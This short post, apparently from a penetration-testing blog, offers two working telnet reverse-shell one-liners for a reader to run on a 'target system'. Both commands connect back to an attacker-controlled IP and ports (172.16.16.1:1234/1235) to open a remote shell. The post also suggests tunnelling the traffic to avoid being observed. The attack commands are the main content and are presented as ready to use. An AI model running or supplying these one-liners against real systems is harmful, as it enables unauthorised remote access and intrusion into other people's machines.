Reverse shells communicate in plaintext, by default. Telnet isn’t often installed by default any more. But, if it does exist on your target system, here are two one liners you can use to spawn a reverse shell with telnet.

Telnet Reverse Shells are Easy

rm -rf /tmp/p; mknod /tmp/p p && telnet 172.16.16.1 1234 0/tmp/p
telnet reverse shells
ugh… telnet

Another Simple Telnet Connect-Back Shell

telnet 172.16.16.1 1234 | /bin/bash | telnet 172.16.16.1 1235

As usual, in these reverse shell scenarios, your IP is 172.16.16.1 and your port is 1234. Telnet should be piped through an encrypted tunnel, unless you don’t mind people snooping on you.